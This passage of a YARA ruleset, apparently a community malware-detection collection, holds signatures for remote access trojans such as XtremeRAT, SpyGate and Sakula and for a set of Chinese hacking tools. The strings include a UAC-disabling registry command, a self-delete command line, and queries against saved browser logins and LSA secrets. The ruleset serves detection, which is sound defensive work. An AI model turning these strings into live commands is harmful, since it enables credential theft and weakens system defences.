    strings:
        $a = "Miner: Failed to Inject."
wide
        $b = "Started GPU Mining on:" wide
        $c = "BK: Hard Bot Killer Ran Successfully!" wide
        $d = "Uploaded Keylogs Successfully!" wide
        $e = "No Slowloris Attack is Running!" wide
        $f = "An ARME Attack is Already Running on" wide
        $g = "Proactive Bot Killer Enabled!" wide
        $h = "PlasmaRAT" wide ascii
        $i = "AntiEverything" wide ascii
    condition:
        all of them
}

// There is no $string2; ten $string* entries exist and seven must hit,
// together with at least one version marker.
rule PredatorPain : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/PredatorPain"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $string1 = "holderwb.txt" wide
        $string3 = "There is a file attached to this email" wide
        $string4 = "screens\\screenshot" wide
        $string5 = "Disablelogger" wide
        $string6 = "\\pidloc.txt" wide
        $string7 = "clearie" wide
        $string8 = "clearff" wide
        $string9 = "emails should be sent to you shortly" wide
        $string10 = "jagex_cache\\regPin" wide
        $string11 = "open=Sys.exe" wide
        $ver1 = "PredatorLogger" wide
        $ver2 = "EncryptedCredentials" wide
        $ver3 = "Predator Pain" wide
    condition:
        7 of ($string*) and any of ($ver*)
}

// $b / $c are UTF-16LE "\hfh.vbs" and "\sc.vbs".
rule Punisher : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/Punisher"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $a = "abccba"
        $b = {5C 00 68 00 66 00 68 00 2E 00 76 00 62 00 73}
        $c = {5C 00 73 00 63 00 2E 00 76 00 62 00 73}
        $d = "SpyTheSpy" wide ascii
        $e = "wireshark" wide
        $f = "apateDNS" wide
        $g = "abccbaDanabccb"
    condition:
        all of them
}

rule PythoRAT : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/PythoRAT"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $a = "TKeylogger"
        $b = "uFileTransfer"
        $c = "TTDownload"
        $d = "SETTINGS"
        $e = "Unknown" wide
        $f = "#@#@#"
        $g = "PluginData"
        $i = "OnPluginMessage"
    condition:
        all of them
}

rule QRat : RAT {
    meta:
        author = "Kevin Breen @KevTheHermit"
        date = "2015/08"
        ref = "http://malwareconfig.com"
        maltype =
"Remote Access Trojan"
        filetype = "jar"
    strings:
        $a0 = "e-data"
        $a1 = "quaverse/crypter"
        $a2 = "Qrypt.class"
        $a3 = "Jarizer.class"
        $a4 = "URLConnection.class"
    condition:
        4 of them
}

rule SmallNet : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/SmallNet"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $split1 = "!!<3SAFIA<3!!"
        $split2 = "!!ElMattadorDz!!"
        $a1 = "stub_2.Properties"
        $a2 = "stub.exe" wide
        $a3 = "get_CurrentDomain"
    condition:
        ($split1 or $split2) and (all of ($a*))
}

// Three SpyGate generations; the older two additionally require a minimum
// number of occurrences of the "abccba" delimiter (#split).
rule SpyGate : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/SpyGate"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $split = "abccba"
        $a1 = "abccbaSpyGateRATabccba"   //$a = Version 0.2.6
        $a2 = "StubX.pdb"
        $a3 = "abccbaDanabccb"
        $b1 = "monikerString" nocase     //$b = Version 2.0
        $b2 = "virustotal1"
        $b3 = "get_CurrentDomain"
        $c1 = "shutdowncomputer" wide    //$c = Version 2.9
        $c2 = "shutdown -r -t 00" wide
        $c3 = "set cdaudio door closed" wide
        $c4 = "FileManagerSplit" wide
        $c5 = "Chating With >> [~Hacker~]" wide
    condition:
        (all of ($a*) and #split > 40) or (all of ($b*) and #split > 10) or (all of ($c*))
}

rule Sub7Nation : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/Sub7Nation"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $a = "EnableLUA /t REG_DWORD /d 0 /f"
        $b = "*A01*"
        $c = "*A02*"
        $d = "*A03*"
        $e = "*A04*"
        $f = "*A05*"
        $g = "*A06*"
        $h = "#@#@#"
        $i = "HostSettings"
        $verSpecific1 = "sevane.tmp"
        $verSpecific2 = "cmd_.bat"
        $verSpecific3 = "a2b7c3d7e4"
        $verSpecific4 = "cmd.dll"
    condition:
        all of them
}

// Despite the RAT tag this only checks the three UPX section/marker names, so it
// flags any UPX-packed executable, malicious or not. Treat a hit as "packed",
// not as a RAT detection.
rule UPX : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
    strings:
        $a = "UPX0"
        $b = "UPX1"
        $c = "UPX!"
condition:
        all of them
}

// Generic configuration-key names ("INSTALL", "MUTEX", ...); only the full set
// together is specific.
rule Vertex : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/Vertex"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $string1 = "DEFPATH"
        $string2 = "HKNAME"
        $string3 = "HPORT"
        $string4 = "INSTALL"
        $string5 = "IPATH"
        $string6 = "MUTEX"
        $res1 = "PANELPATH"
        $res2 = "ROOTURL"
    condition:
        all of them
}

rule VirusRat : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/VirusRat"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $string0 = "virustotal"
        $string1 = "virusscan"
        $string2 = "abccba"
        $string3 = "pronoip"
        $string4 = "streamWebcam"
        $string5 = "DOMAIN_PASSWORD"
        $string6 = "Stub.Form1.resources"
        $string7 = "ftp://{0}@{1}" wide
        $string8 = "SELECT * FROM moz_logins" wide
        $string9 = "SELECT * FROM moz_disabledHosts" wide
        $string10 = "DynDNS\\Updater\\config.dyndns" wide
        $string11 = "|BawaneH|" wide
    condition:
        all of them
}

// The ref URL points at the AAR page and filetype says "exe", although the
// strings are JAR entry paths; both look like copy-over from rule AAR above.
rule unrecom : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/AAR"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $meta = "META-INF"
        $conf = "load/ID"
        $a = "load/JarMain.class"
        $b = "load/MANIFEST.MF"
        $c = "plugins/UnrecomServer.class"
    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

// Sakula versions 1.0 - 1.4. Each rule requires "MZ" at offset 0 (the same PE
// check other rules in this file spell as uint16(0) == 0x5a4d). v1.0 and v1.2
// are distinguished from later builds by the absence of $v1_1.

rule sakula_v1_0: RAT {
    meta:
        description = "Sakula v1.0"
        date = "2015-10-13"
        author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"
    strings:
        $m1 = "%d_of_%d_for_%s_on_%s"
        $m2 = "/c ping 127.0.0.1 & del /q \"%s\""
        $m3 = "=%s&type=%d"
        $m4 = "?photoid="
        $m5 = "iexplorer"
        $m6 = "net start \"%s\""
        $v1_1 = "MicroPlayerUpdate.exe"
        $MZ = "MZ"
    condition:
        $MZ at 0 and all of ($m*) and not $v1_1
}

rule sakula_v1_1: RAT {
    meta:
        description = "Sakula v1.1"
        date = "2015-10-13"
        author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"
    strings:
        $m1 = "%d_of_%d_for_%s_on_%s"
        $m2 = "/c ping 127.0.0.1 & del /q \"%s\""
        $m3 = "=%s&type=%d"
        $m4 = "?photoid="
        $m5 = "iexplorer"
        $m6 = "net start \"%s\""
        $v1_1 = "MicroPlayerUpdate.exe"
        $MZ = "MZ"
    condition:
        $MZ at 0 and all of them
}

rule sakula_v1_2: RAT {
    meta:
        description = "Sakula v1.2"
        date = "2015-10-13"
        author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"
    strings:
        $m1 = "%d_of_%d_for_%s_on_%s"
        $m2 = "/c ping 127.0.0.1 & del /q \"%s\""
        $m3 = "cmd.exe /c rundll32 \"%s\""
        $v1_1 = "MicroPlayerUpdate.exe"
        $v1_2 = "CCPUpdate"
        $MZ = "MZ"
    condition:
        $MZ at 0 and $m1 and $m2 and $m3 and $v1_2 and not $v1_1
}

rule sakula_v1_3: RAT {
    meta:
        description = "Sakula v1.3"
        date = "2015-10-13"
        author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"
    strings:
        $m1 = "%d_of_%d_for_%s_on_%s"
        $m2 = "/c ping 127.0.0.1 & del /q \"%s\""
        $m3 = "cmd.exe /c rundll32 \"%s\""
        $v1_3 = { 81 3E 78 03 00 00 75 57 8D 54 24 14 52 68 0C 05 41 00 68 01 00 00 80 FF 15 00 F0 40 00 85 C0 74 10 8B 44 24 14 68 2C 31 41 00 50 FF 15 10 F0 40 00 8B 4C 24 14 51 FF 15 24 F0 40 00 E8 0F 09 00 }
        $MZ = "MZ"
    condition:
        $MZ at 0 and all of them
}

rule sakula_v1_4: RAT {
    meta:
        description = "Sakula v1.4"
        date = "2015-10-13"
        author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"
    strings:
        $m1 = "%d_of_%d_for_%s_on_%s"
        $m2 = "/c ping 127.0.0.1 & del /q \"%s\""
        $m3 = "cmd.exe /c rundll32 \"%s\""
        $v1_4 = { 50 E8 CD FC FF FF 83 C4 04 68 E8 03 00 00 FF D7 56 E8 54 12 00 00 E9 AE FE FF FF E8 13 F5 FF FF }
        $MZ = "MZ"
    condition:
        $MZ at 0 and all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

// The "(S)" / "(G)" groups are a convention to stop the rule file matching itself.
rule ShadowTech_2 {
    meta:
        description = "ShadowTech RAT"
        author = "botherder https://github.com/botherder"
    strings:
        $string1 = /\#(S)trings/
        $string2 = /\#(G)UID/
        $string3 = /\#(B)lob/
        $string4 = /(S)hadowTech Rat\.exe/
        $string5 = /(S)hadowTech_Rat/
    condition:
        all of them
}

rule ShadowTech {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/ShadowTech"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $a = "ShadowTech" nocase
        $b = "DownloadContainer"
        $c = "MySettings"
        $d = "System.Configuration"
        $newline = "#-@NewLine@-#" wide
        $split = "pSIL" wide
        $key = "ESIL" wide
    condition:
        4 of them
}

// Four alternative signatures: data-file header/trailer markers, the embedded
// "Data$$" markers, the self-delete command line, or the shim-engine exports
// used by the loader. $dll/$dat alone are not decisive and only appear in
// combination.
rule shimrat: RAT {
    meta:
        description = "Detects ShimRat and the ShimRat loader"
        author = "Yonathan Klijnsma (yonathan.klijnsma@fox-it.com)"
        date = "20/11/2015"
        ref = "https://blog.fox-it.com/2016/06/15/mofang-a-politically-motivated-information-stealing-adversary/"
    strings:
        $dll = ".dll"
        $dat = ".dat"
        $headersig = "QWERTYUIOPLKJHG"
        $datasig = "MNBVCXZLKJHGFDS"
        $datamarker1 = "Data$$00"
        $datamarker2 = "Data$$01%c%sData"
        $cmdlineformat = "ping localhost -n 9 /c %s > nul"
        $demoproject_keyword1 = "Demo"
        $demoproject_keyword2 = "Win32App"
        $comspec = "COMSPEC"
        $shim_func1 = "ShimMain"
        $shim_func2 = "NotifyShims"
        $shim_func3 = "GetHookAPIs"
    condition:
        ($dll and $dat and $headersig and $datasig) or
        ($datamarker1 and $datamarker2) or
        ($cmdlineformat and $demoproject_keyword1 and $demoproject_keyword2 and $comspec) or
        ($dll and $dat and $shim_func1 and $shim_func2 and $shim_func3)
}

rule shimratreporter: RAT {
    meta:
        description = "Detects ShimRatReporter"
        author = "Yonathan Klijnsma (yonathan.klijnsma@fox-it.com)"
        date = "20/11/2015"
        ref = "https://blog.fox-it.com/2016/06/15/mofang-a-politically-motivated-information-stealing-adversary/"
    strings:
        $IpInfo = "IP-INFO"
        $NetworkInfo = "Network-INFO"
        $OsInfo = "OS-INFO"
        $ProcessInfo = "Process-INFO"
        $BrowserInfo = "Browser-INFO"
        $QueryUserInfo = "QueryUser-INFO"
        $UsersInfo = "Users-INFO"
        $SoftwareInfo = "Software-INFO"
        $AddressFormat = "%02X-%02X-%02X-%02X-%02X-%02X"
        $proxy_str = "(from environment) = %s"
        $netuserfun = "NetUserEnum"
        $networkparams = "GetNetworkParams"
    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

rule TerminatorRat : RAT {
    meta:
        description = "Terminator RAT"
        author = "Jean-Philippe Teissier / @Jipe_"
        date = "2013-10-24"
        filetype = "memory"
        version = "1.0"
        ref1 = "http://www.fireeye.com/blog/technical/malware-research/2013/10/evasive-tactics-terminator-rat.html"
    strings:
        $a = "Accelorator"
        $b = "<html><title>12356</title><body>"
    condition:
        all of them
}

// Matches on two embedded hex constants; either one suffices.
rule TROJAN_Notepad_shell_crew : Trojan {
    meta:
        author = "RSA_IR"
        Date = "4Jun13"
        File = "notepad.exe v 1.1"
        MD5 = "106E63DBDA3A76BEEB53A8BBD8F98927"
    strings:
        $s1 = "75BAA77C842BE168B0F66C42C7885997"
        $s2 = "B523F63566F407F3834BCC54AAA32524"
    condition:
        $s1 or $s2
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// XtremeRAT family. The "(X)" / "(U)" groups keep the rule file from matching itself.
rule Xtreme {
    meta:
        description = "Xtreme RAT"
        author = "botherder https://github.com/botherder"
    strings:
        $string1 = /(X)tremeKeylogger/ wide ascii
        $string2 = /(X)tremeRAT/ wide ascii
        $string3 = /(X)TREMEUPDATE/ wide ascii
        $string4 = /(S)TUBXTREMEINJECTED/ wide ascii
        $unit1 = /(U)nitConfigs/ wide ascii
        $unit2 = /(U)nitGetServer/ wide ascii
        $unit3 = /(U)nitKeylogger/ wide ascii
        $unit4 = /(U)nitCryptString/ wide ascii
        $unit5 = /(U)nitInstallServer/ wide ascii
        $unit6 = /(U)nitInjectServer/ wide ascii
        $unit7 = /(U)nitInjectProcess/ wide ascii
        $unit8 = /(U)nitBinder/ wide ascii
    condition:
        5 of them
}

// Single UTF-16LE "XTREME" token; on its own this is a weak indicator and will
// hit unrelated files that contain the word.
rule xtreme_rat : Trojan {
    meta:
        author="Kevin Falcoz"
        date="23/02/2013"
        description="Xtreme RAT"
    strings:
        $signature1={58 00 54 00 52 00 45 00 4D 00 45}   /*X.T.R.E.M.E*/
    condition:
        $signature1
}

rule XtremeRATCode : XtremeRAT Family {
    meta:
        description = "XtremeRAT code features"
        author = "Seth Hardy"
        last_modified = "2014-07-09"
    strings:
        // call; fstp st
        $ = { E8 ?? ?? ?? ?? DD D8 }
        // hiding string: a run of "mov byte ptr [ebp+disp32], imm8" (C6 85 ...) stores
        $ = { C6 85 ?? ?? ?? ?? 4D C6 85 ?? ?? ?? ?? 70 C6 85 ?? ?? ?? ?? 64 C6 85 ?? ?? ?? ?? 62 C6 85 ?? ?? ?? ?? 6D }
    condition:
        all of them
}

rule XtremeRATStrings : XtremeRAT Family {
    meta:
        description = "XtremeRAT Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-07-09"
    strings:
        $ = "dqsaazere"
        $ = "-GCCLIBCYGMING-EH-TDM1-SJLJ-GTHR-MINGW32"
    condition:
        all of them
}

// Umbrella rule: fires when either of the two rules above fires.
rule XtremeRAT : Family {
    meta:
        description = "XtremeRAT"
        author = "Seth Hardy"
        last_modified = "2014-07-09"
    condition:
        XtremeRATCode or XtremeRATStrings
}

rule xtremrat : rat {
    meta:
        author = "Jean-Philippe Teissier / @Jipe_"
        description = "Xtrem RAT v3.5"
        date = "2012-07-12"
        version = "1.0"
        filetype = "memory"
    strings:
        $a = "XTREME" wide
        $b = "XTREMEBINDER" wide
        $c = "STARTSERVERBUFFER" wide
        $d = "SOFTWARE\\XtremeRAT" wide
        $e = "XTREMEUPDATE" wide
        $f = "XtremeKeylogger" wide
        $g = "myversion|3.5" wide
        $h = "xtreme rat" wide nocase
    condition:
        2 of them
}

// Event-log rules: Security-Auditing 5156 (permitted connection) for sethc.exe
// plus 4688 (process creation) for the dropped "Microsoft Word.exe".
// xtreme_rat_0 and xtreme_rat_1 differ only in meta and always fire together.
rule xtreme_rat_0 {
    meta:
        maltype = "Xtreme RAT"
        reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/xtreme-rat-targets-israeli-government/"
    strings:
        $type = "Microsoft-Windows-Security-Auditing"
        $eventid = "5156"
        $data = "windows\\system32\\sethc.exe"
        $type1 = "Microsoft-Windows-Security-Auditing"
        $eventid1 = "4688"
        $data1 = "AppData\\Local\\Temp\\Microsoft Word.exe"
    condition:
        all of them
}

rule xtreme_rat_1 {
    meta:
        maltype = "Xtreme RAT"
        ref = "https://github.com/reed1713"
        reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/xtreme-rat-targets-israeli-government/"
    strings:
        $type = "Microsoft-Windows-Security-Auditing"
        $eventid = "5156"
        $data = "windows\\system32\\sethc.exe"
        $type1 = "Microsoft-Windows-Security-Auditing"
        $eventid1 = "4688"
        $data1 = "AppData\\Local\\Temp\\Microsoft Word.exe"
    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// Single hard-coded query string carried by the sample.
rule zoxPNG_RAT {
    meta:
        Author = "Novetta Advanced Research Group"
        Date = "2014/11/14"
        Description = "ZoxPNG RAT, url inside"
        Reference = "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf"
    strings:
        $url = "png&w=800&h=600&ei=CnJcUcSBL4rFkQX444HYCw&zoom=1&ved=1t:3588,r:1,s:0,i:92&iact=rc&dur=368&page=1&tbnh=184&tbnw=259&start=0&ndsp=20&tx=114&ty=58"
    condition:
        $url
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

// jRAT config block as it appears in memory: "port=<1-5 digits>SPLIT".
rule jRAT_conf : RAT {
    meta:
        description = "jRAT configuration"
        author = "Jean-Philippe Teissier / @Jipe_"
        date = "2013-10-11"
        filetype = "memory"
        version = "1.0"
        ref1 = "https://github.com/MalwareLu/config_extractor/blob/master/config_jRAT.py"
        ref2 = "http://www.ghettoforensics.com/2013/10/dumping-malware-configuration-data-from.html"
    strings:
        $a = /port=[0-9]{1,5}SPLIT/
    condition:
        $a
}

// Same strings and condition as rule Imminent earlier in this file; the two
// rules will always hit together.
rule xRAT : RAT {
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/xRat"
        maltype = "Remote Access Trojan"
        filetype = "exe"
    strings:
        $v1a = "DecodeProductKey"
        $v1b = "StartHTTPFlood"
        $v1c = "CodeKey"
        $v1d = "MESSAGEBOX"
        $v1e = "GetFilezillaPasswords"
        $v1f = "DataIn"
        $v1g = "UDPzSockets"
        $v1h = {52 00 54 00 5F 00 52 00 43 00 44 00 41 00 54 00 41}   // "RT_RCDATA" as UTF-16LE
        $v2a = "<URL>k__BackingField"
        $v2b = "<RunHidden>k__BackingField"
        $v2c = "DownloadAndExecute"
        $v2d = "-CHECK & PING -n 2 127.0.0.1 & EXIT" wide
        $v2e = "england.png" wide
        $v2f = "Showed Messagebox" wide
    condition:
        all of ($v1*) or all of ($v2*)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

// Auto-generated (YaraGenerator) string set: 18 of the 19 strings must be
// present, which compensates for the generic ones ("Secure", "memcmp", "reader").
// The meta block lists hash1 twice with the same value and has no hash6/hash7;
// that is how the source reads, so it is left untouched.
rule xRAT20 : RAT {
    meta:
        author = "Rottweiler"
        date = "2015-08-20"
        description = "Identifies xRAT 2.0 samples"
        maltype = "Remote Access Trojan"
        hash0 = "cda610f9cba6b6242ebce9f31faf5d9c"
        hash1 = "60d7b0d2dfe937ac6478807aa7043525"
        hash2 = "d1b577fbfd25cc5b873b202cfe61b5b8"
        hash3 = "1820fa722906569e3f209d1dab3d1360"
        hash4 = "8993b85f5c138b0afacc3ff04a2d7871"
        hash5 = "0c231ed8a800b0f17f897241f1d5f4e3"
        hash1 = "60d7b0d2dfe937ac6478807aa7043525"
        hash8 = "2c198e3e0e299a51e5d955bb83c62a5e"
        sample_filetype = "exe"
        yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
    strings:
        $string0 = "GetDirectory: File not found" wide
        $string1 = "<>m__Finally8"
        $string2 = "Secure"
        $string3 = "ReverseProxyClient"
        $string4 = "DriveDisplayName"
        $string5 = "<IsError>k__BackingField"
        $string6 = "set_InstallPath"
        $string7 = "memcmp"
        $string8 = "urlHistory"
        $string9 = "set_AllowAutoRedirect"
        $string10 = "lpInitData"
        $string11 = "reader"
        $string12 = "<FromRawDataGlobal>d__f"
        $string13 = "mq.png" wide
        $string14 = "remove_KeyDown"
        $string15 = "ProtectedData"
        $string16 = "m_hotkeys"
        $string17 = "get_Hour"
        $string18 = "\\mozglue.dll" wide
    condition:
        18 of them
}

// "Chinese Hacktool Set" rules (Florian Roth): PE check (MZ magic) plus a size
// cap, then the listed strings. The strings here are the tool's own usage text.
rule mswin_check_lm_group {
    meta:
        description = "Chinese Hacktool Set - file mswin_check_lm_group.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "115d87d7e7a3d08802a9e5fd6cd08e2ec633c367"
    strings:
        $s1 = "Valid_Global_Groups: checking group membership of '%s\\%s'."
fullword ascii
        $s2 = "Usage: %s [-D domain][-G][-P][-c][-d][-h]" fullword ascii
        $s3 = "-D default user Domain" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 380KB and all of them
}

// 5 of 6 required; $s2 ("User-Agent:") and $s4 ("www.example.com") are common
// on their own, the error strings carry the specificity.
rule WAF_Bypass {
    meta:
        description = "Chinese Hacktool Set - file WAF-Bypass.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "860a9d7aac2ce3a40ac54a4a0bd442c6b945fa4e"
    strings:
        $s1 = "Email: blacksplitn@gmail.com" fullword wide
        $s2 = "User-Agent:" fullword wide
        $s3 = "Send Failed.in RemoteThread" fullword ascii
        $s4 = "www.example.com" fullword wide
        $s5 = "Get Domain:%s IP Failed." fullword ascii
        $s6 = "Connect To Server Failed." fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 7992KB and 5 of them
}

rule Guilin_veterans_cookie_spoofing_tool {
    meta:
        description = "Chinese Hacktool Set - file Guilin veterans cookie spoofing tool.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "06b1969bc35b2ee8d66f7ce8a2120d3016a00bb1"
    strings:
        $s0 = "kernel32.dll^G" fullword ascii
        $s1 = "\\.Sus\"B" fullword ascii
        $s4 = "u56Load3" fullword ascii
        $s11 = "O MYTMP(iM) VALUES (" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 1387KB and all of them
}

rule MarathonTool {
    meta:
        description = "Chinese Hacktool Set - file MarathonTool.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "084a27cd3404554cc799d0e689f65880e10b59e3"
    strings:
        $s0 = "MarathonTool" ascii
        $s17 = "/Blind SQL injection tool based in heavy queries" fullword ascii
        $s18 = "SELECT UNICODE(SUBSTRING((system_user),{0},1))" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 1040KB and all of them
}

rule PLUGIN_TracKid {
    meta:
        description = "Chinese Hacktool Set - file TracKid.dll"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "a114181b334e850d4b33e9be2794f5bb0eb59a09"
    strings:
        $s0 = "E-mail: cracker_prince@163.com" fullword
ascii
        $s1 = ".\\TracKid Log\\%s.txt" fullword ascii
        $s2 = "Coded by prince" fullword ascii
        $s3 = "TracKid.dll" fullword ascii
        $s4 = ".\\TracKid Log" fullword ascii
        $s5 = "%08x -- %s" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 200KB and 3 of them
}

rule Pc_pc2015 {
    meta:
        description = "Chinese Hacktool Set - file pc2015.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "de4f098611ac9eece91b079050b2d0b23afe0bcb"
    strings:
        $s0 = "\\svchost.exe" fullword ascii
        $s1 = "LON\\OD\\O-\\O)\\O%\\O!\\O=\\O9\\O5\\O1\\O" fullword ascii
        $s8 = "%s%08x.001" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 309KB and all of them
}

// French UI strings from the credential-dumping module; the LSA secrets
// registry path ($s3) is the most telling indicator.
rule sekurlsa {
    meta:
        description = "Chinese Hacktool Set - file sekurlsa.dll"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5"
    strings:
        $s1 = "Bienvenue dans un processus distant" fullword wide
        $s2 = "Format d'appel invalide : addLogonSession [idSecAppHigh] idSecAppLow Utilisateur" wide
        $s3 = "SECURITY\\Policy\\Secrets" fullword wide
        $s4 = "Injection de donn" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 1150KB and all of them
}

rule mysqlfast {
    meta:
        description = "Chinese Hacktool Set - file mysqlfast.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "32b60350390fe7024af7b4b8fbf50f13306c546f"
    strings:
        $s2 = "Invalid password hash: %s" fullword ascii
        $s3 = "-= MySql Hash Cracker =- " fullword ascii
        $s4 = "Usage: %s hash" fullword ascii
        $s5 = "Hash: %08lx%08lx" fullword ascii
        $s6 = "Found pass: " fullword ascii
        $s7 = "Pass not found" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 900KB and 4 of them
}

rule DTools2_02_DTools {
    meta:
        description = "Chinese Hacktool Set - file DTools.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "9f99771427120d09ec7afa3b21a1cb9ed720af12"
    strings:
        $s0 =
"kernel32.dll" ascii $s1 = "TSETPASSWORDFORM" fullword wide $s2 = "TGETNTUSERNAMEFORM" fullword wide $s3 = "TPORTFORM" fullword wide $s4 = "ShellFold" fullword ascii $s5 = "DefaultPHotLigh" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 2000KB and all of them } rule dll_PacketX { meta: description = "Chinese Hacktool Set - file PacketX.dll - ActiveX wrapper for WinPcap packet capture library" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" score = 50 hash = "3f0908e0a38512d2a4fb05a824aa0f6cf3ba3b71" strings: $s9 = "[Failed to load winpcap packet.dll." wide $s10 = "PacketX Version" wide condition: uint16(0) == 0x5a4d and filesize < 1920KB and all of them } rule SqlDbx_zhs { meta: description = "Chinese Hacktool Set - file SqlDbx_zhs.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "e34228345498a48d7f529dbdffcd919da2dea414" strings: $s0 = "S.failed_logins \"Failed Login Attempts\", " fullword ascii $s7 = "SELECT ROLE, PASSWORD_REQUIRED FROM SYS.DBA_ROLES ORDER BY ROLE" fullword ascii $s8 = "SELECT spid 'SPID', status 'Status', db_name (dbid) 'Database', loginame 'Login'" ascii $s9 = "bcp.exe <:schema:>.<:table:> out \"<:file:>\" -n -S <:server:> -U <:user:> -P <:" ascii $s11 = "L.login_policy_name AS \"Login Policy\", " fullword ascii $s12 = "mailto:support@sqldbx.com" fullword ascii $s15 = "S.last_login_time \"Last Login\", " fullword ascii condition: uint16(0) == 0x5a4d and 4 of them } rule ms10048_x86 { meta: description = "Chinese Hacktool Set - file ms10048-x86.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "e57b453966e4827e2effa4e153f2923e7d058702" strings: $s1 = "[ ] Resolving PsLookupProcessByProcessId" fullword ascii $s2 = "The target is most likely patched." fullword ascii $s3 = "Dojibiron by Ronald Huizer, (c) master@h4cker.us ." 
